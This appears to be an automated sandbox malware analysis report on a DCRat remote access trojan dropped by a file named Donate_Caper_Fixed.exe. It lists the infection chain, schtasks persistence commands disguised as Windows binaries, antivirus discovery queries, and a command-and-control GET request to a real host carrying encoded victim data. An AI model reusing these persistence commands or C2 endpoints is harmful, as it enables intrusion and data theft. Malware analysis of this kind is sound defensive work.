DN
Source: audiodg.exe, 00000012.00000002.911722317.000001D415362000.00000004.00000001.sdmp	Binary or memory string: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIyV2Zh5WYNBSbhJ3ZvJHUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1
Source: audiodg.exe, 00000012.00000002.912758776.000001D41552F000.00000004.00000001.sdmp	Binary or memory string: 0nIyV2Zh5WYNBSbhJ3ZvJHUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeU
Source: audiodg.exe, 00000012.00000002.914355080.000001D42D8A0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe

Code function: 0_2_0041E0DE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_0041E0DE

Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe

0_2_004251E5

Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe

Code function: 4_2_0018753D mov eax, dword ptr fs:[00000030h]

4_2_0018753D

Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe

Code function: 4_2_0018B710 GetProcessHeap,

4_2_0018B710

Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe	Process token adjusted: Debug
Source: C:\Windows\AppReadiness\audiodg.exe	Process token adjusted: Debug
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Code function: 0_2_0041E0DE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0041E0DE
Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Code function: 0_2_0041F9DB _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0041F9DB
Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Code function: 0_2_00423A61 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,	0_2_00423A61
Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Code function: 0_2_00422FA5 SetUnhandledExceptionFilter,	0_2_00422FA5
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Code function: 4_2_0017F063 SetUnhandledExceptionFilter,	4_2_0017F063
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Code function: 4_2_0017F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_0017F22B
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Code function: 4_2_0018866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_0018866F
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Code function: 4_2_0017EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_0017EF05

Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Process created: C:\Users\user\AppData\Roaming\Donate_Caper2021.sfx.exe 'C:\Users\user\AppData\Roaming\Donate_Caper2021.sfx.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.sfx.exe	Process created: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe 'C:\Users\user\AppData\Roaming\Donate_Caper2021.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\sessionhostmonitor\RfInN2Wh.vbe'	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\sessionhostmonitor\1blSZLIJyv82rdJZrD2y.bat' '	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process created: C:\Windows\System32\schtasks.exe 'schtasks' /create /tn 'audiodg' /sc ONLOGON /tr ''C:\Windows\AppReadiness\audiodg.exe'' /rl HIGHEST /f	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process created: C:\Windows\System32\schtasks.exe 'schtasks' /create /tn 'msiexec' /sc ONLOGON /tr ''C:\Windows\System32\d3d9on12\msiexec.exe'' /rl HIGHEST /f	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process created: C:\Windows\System32\schtasks.exe 'schtasks' /create /tn 'UsoClient' /sc ONLOGON /tr ''C:\Windows\System32\wlanapi\UsoClient.exe'' /rl HIGHEST /f	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process created: C:\Windows\System32\schtasks.exe 'schtasks' /create /tn 'HxTsr' /sc ONLOGON /tr ''C:\MSOCache\All Users\{90160000-0115-0409-0000-0000000FF1CE}-C\HxTsr.exe'' /rl HIGHEST /f	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process created: C:\Windows\System32\schtasks.exe 'schtasks' /create /tn 'dwm' /sc ONLOGON /tr ''C:\Program Files (x86)\microsoft.net\ADOMD.NET\dwm.exe'' /rl HIGHEST /f	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process created: C:\Windows\System32\schtasks.exe 'schtasks' /create /tn 'conhost' /sc ONLOGON /tr ''C:\Program Files (x86)\microsoft sql server\110\Shared\conhost.exe'' /rl HIGHEST /f	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process created: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe C:\Program Files (x86)\microsoft sql server\110\Shared\conhost.exe	Jump to behavior

Source: sessionhostmonitorSavesruntimeNet.exe, 0000000A.00000002.698876300.000002C380001000.00000004.00000001.sdmp, audiodg.exe, 00000012.00000002.911722317.000001D415362000.00000004.00000001.sdmp, msiexec.exe, 00000015.00000002.725689848.000001B22A5C1000.00000004.00000001.sdmp, conhost.exe, 0000001C.00000002.734284162.0000027100001000.00000004.00000001.sdmp, conhost.exe, 0000001D.00000002.714934472.0000022709901000.00000004.00000001.sdmp, dwm.exe, 0000001E.00000002.739273160.0000023849951000.00000004.00000001.sdmp, audiodg.exe, 00000021.00000002.729298028.0000026F02331000.00000004.00000001.sdmp, msiexec.exe, 00000023.00000002.750274756.00000176CC091000.00000004.00000001.sdmp	Binary or memory string: Program Manager
Source: sessionhostmonitorSavesruntimeNet.exe, 0000000A.00000002.698876300.000002C380001000.00000004.00000001.sdmp, audiodg.exe, 00000012.00000002.909612258.000001D414E61000.00000004.00000001.sdmp, msiexec.exe, 00000015.00000002.725689848.000001B22A5C1000.00000004.00000001.sdmp, conhost.exe, 0000001C.00000002.734284162.0000027100001000.00000004.00000001.sdmp, conhost.exe, 0000001D.00000002.714934472.0000022709901000.00000004.00000001.sdmp, dwm.exe, 0000001E.00000002.739273160.0000023849951000.00000004.00000001.sdmp, audiodg.exe, 00000021.00000002.729298028.0000026F02331000.00000004.00000001.sdmp, msiexec.exe, 00000023.00000002.750274756.00000176CC091000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: audiodg.exe, 00000012.00000002.909556652.000001D413A50000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: audiodg.exe, 00000012.00000002.913658149.000001D42D7A0000.00000004.00000001.sdmp	Binary or memory string: Program ManageryCenter2
Source: audiodg.exe, 00000012.00000002.911722317.000001D415362000.00000004.00000001.sdmp	Binary or memory string: l":"8005","timezone":"Europe\/Zurich","readme":"https:\/\/ipinfo.io\/missingauth"},"WinVer":"Windows 10 Pro 64 Bit","TAG":"","isMicrophone":"Y","isWebcam":"N","isAdmin":"Y","ACTWindow":"Program Manager"}
Source: audiodg.exe, 00000012.00000002.909556652.000001D413A50000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: audiodg.exe, 00000012.00000002.911722317.000001D415362000.00000004.00000001.sdmp	Binary or memory string: rich","region":"Zurich","country":"CH","loc":"47.3667,8.5500","org":"AS60068 Datacamp Limited","postal":"8005","timezone":"Europe\/Zurich","readme":"https:\/\/ipinfo.io\/missingauth"},"WinVer":"Windows 10 Pro 64 Bit","TAG":"","isMicrophone":"Y","isWebcam":"N","isAdmin":"Y","ACTWindow":"Program Manager"}
Source: audiodg.exe, 00000012.00000002.912758776.000001D41552F000.00000004.00000001.sdmp	Binary or memory string: Program Manager`

Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe

Code function: 0_2_00410A5B cpuid

0_2_00410A5B

Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Code function: GetLocaleInfoA,	0_2_004259C0
Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Code function: GetLocaleInfoW,GetNumberFormatW,	0_2_0040CDD7
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Code function: GetLocaleInfoW,GetNumberFormatW,	4_2_0017A63C

Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Queries volume information: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe VolumeInformation	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Queries volume information: C:\Windows\AppReadiness\audiodg.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Queries volume information: C:\Windows\System32\d3d9on12\msiexec.exe VolumeInformation
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Queries volume information: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe VolumeInformation
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Queries volume information: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe VolumeInformation
Source: C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe	Queries volume information: C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe VolumeInformation
Source: C:\Windows\AppReadiness\audiodg.exe	Queries volume information: C:\Windows\AppReadiness\audiodg.exe VolumeInformation
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Queries volume information: C:\Windows\System32\d3d9on12\msiexec.exe VolumeInformation

Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe

Code function: 0_2_0041C050 GetSystemTimeAsFileTime,

0_2_0041C050

Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe

Code function: 4_2_0016ACF5 GetVersionExW,

4_2_0016ACF5

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: audiodg.exe, 00000012.00000002.914781386.000001D42DAE0000.00000004.00000001.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\AppReadiness\audiodg.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\AppReadiness\audiodg.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information:

Yara detected DCRat

Show sources

Source: Yara match	File source: 0000001C.00000002.734284162.0000027100001000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.739273160.0000023849951000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.698876300.000002C380001000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.762188942.00000216B8A01000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.909612258.000001D414E61000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.725689848.000001B22A5C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.742781923.000001BC12B71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.729298028.0000026F02331000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.750274756.00000176CC091000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.714934472.0000022709901000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.779854110.00000189D5741000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.740896848.000002334FCB1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dwm.exe PID: 6912, type: MEMORY
Source: Yara match	File source: Process Memory Space: audiodg.exe PID: 6104, type: MEMORY
Source: Yara match	File source: Process Memory Space: sessionhostmonitorSavesruntimeNet.exe PID: 5168, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 6544, type: MEMORY
Source: Yara match	File source: Process Memory Space: audiodg.exe PID: 6636, type: MEMORY

Remote Access Functionality:

Yara detected DCRat

Show sources

Source: Yara match	File source: 0000001C.00000002.734284162.0000027100001000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.739273160.0000023849951000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.698876300.000002C380001000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.762188942.00000216B8A01000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.909612258.000001D414E61000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.725689848.000001B22A5C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.742781923.000001BC12B71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.729298028.0000026F02331000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.750274756.00000176CC091000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.714934472.0000022709901000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.779854110.00000189D5741000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.740896848.000002334FCB1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dwm.exe PID: 6912, type: MEMORY
Source: Yara match	File source: Process Memory Space: audiodg.exe PID: 6104, type: MEMORY
Source: Yara match	File source: Process Memory Space: sessionhostmonitorSavesruntimeNet.exe PID: 5168, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 6544, type: MEMORY
Source: Yara match	File source: Process Memory Space: audiodg.exe PID: 6636, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation131	DLL Side-Loading1	DLL Side-Loading1	Disable or Modify Tools1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scripting11	Scheduled Task/Job1	Access Token Manipulation1	Deobfuscate/Decode Files or Information1	LSASS Memory	File and Directory Discovery2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Encrypted Channel12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Native API1	Registry Run Keys / Startup Folder31	Process Injection12	Scripting11	Security Account Manager	System Information Discovery146	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Command and Scripting Interpreter3	Logon Script (Mac)	Scheduled Task/Job1	Obfuscated Files or Information2	NTDS	Query Registry1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Scheduled Task/Job1	Network Logon Script	Registry Run Keys / Startup Folder31	Software Packing1	LSA Secrets	Security Software Discovery171	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	DLL Side-Loading1	Cached Domain Credentials	Process Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Masquerading222	DCSync	Virtualization/Sandbox Evasion51	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Virtualization/Sandbox Evasion51	Proc Filesystem	Application Window Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Access Token Manipulation1	/etc/passwd and /etc/shadow	Remote System Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Process Injection12	Network Sniffing	System Network Configuration Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Hidden Files and Directories1	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Donate_Caper_Fixed.exe	35%	Virustotal		Browse
Donate_Caper_Fixed.exe	8%	Metadefender		Browse
Donate_Caper_Fixed.exe	31%	ReversingLabs	ByteCode-MSIL.Trojan.SpyNoon

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe	100%	Joe Sandbox ML
C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	100%	Joe Sandbox ML
C:\Windows\System32\wlanapi\UsoClient.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	100%	Joe Sandbox ML
C:\MSOCache\All Users\{90160000-0115-0409-0000-0000000FF1CE}-C\HxTsr.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	100%	Joe Sandbox ML
C:\Windows\System32\d3d9on12\msiexec.exe	100%	Joe Sandbox ML
C:\Windows\AppReadiness\audiodg.exe	100%	Joe Sandbox ML
C:\MSOCache\All Users\{90160000-0115-0409-0000-0000000FF1CE}-C\HxTsr.exe	32%	Metadefender		Browse
C:\MSOCache\All Users\{90160000-0115-0409-0000-0000000FF1CE}-C\HxTsr.exe	42%	ReversingLabs	ByteCode-MSIL.Trojan.SpyNoon
C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	32%	Metadefender		Browse
C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	42%	ReversingLabs	ByteCode-MSIL.Trojan.SpyNoon
C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe	32%	Metadefender		Browse
C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe	42%	ReversingLabs	ByteCode-MSIL.Trojan.SpyNoon
C:\Users\user\AppData\Roaming\DCRatBuild.sfx.exe	29%	ReversingLabs	ByteCode-MSIL.Trojan.SpyNoon
C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	40%	ReversingLabs	ByteCode-MSIL.Trojan.SpyNoon
C:\Users\user\AppData\Roaming\Donate_Caper2021.sfx.exe	29%	ReversingLabs	ByteCode-MSIL.Trojan.SpyNoon
C:\Users\user\AppData\Roaming\ks4.021.3.10.391ru_25000.exe	0%	ReversingLabs
C:\Windows\AppReadiness\audiodg.exe	32%	Metadefender		Browse
C:\Windows\AppReadiness\audiodg.exe	42%	ReversingLabs	ByteCode-MSIL.Trojan.SpyNoon
C:\Windows\System32\d3d9on12\msiexec.exe	32%	Metadefender		Browse
C:\Windows\System32\d3d9on12\msiexec.exe	42%	ReversingLabs	ByteCode-MSIL.Trojan.SpyNoon

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
4.2.Donate_Caper2021.exe.30fcd9b.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://crls.pki.goog/gts1d2/mf1x6KtY0O4.crl0	0%	Avira URL Cloud	safe
https://ipinfo.iox	0%	Avira URL Cloud	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
http://cw51552.t0y;	0%	Avira URL Cloud	safe
http://cw51552.tmweb.ru8	0%	Avira URL Cloud	safe
http://pki.goog/gsr2/GTS1D2.crt0	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1D2.crt0	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1D2.crt0	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1D2.crt0	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cw51552.tmweb.ru	188.225.40.161	true	false		high
ipinfo.io	216.239.32.21	true	false		high

Contacted URLs

Name	Malicious	Reputation
http://cw51552.tmweb.ru/pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN	false	high
http://cw51552.tmweb.ru/pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&f06dddd6da1af50c4d2046ad80cd0bd3=7406d4e040947858aca2d8984e05343c&ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23	false	high
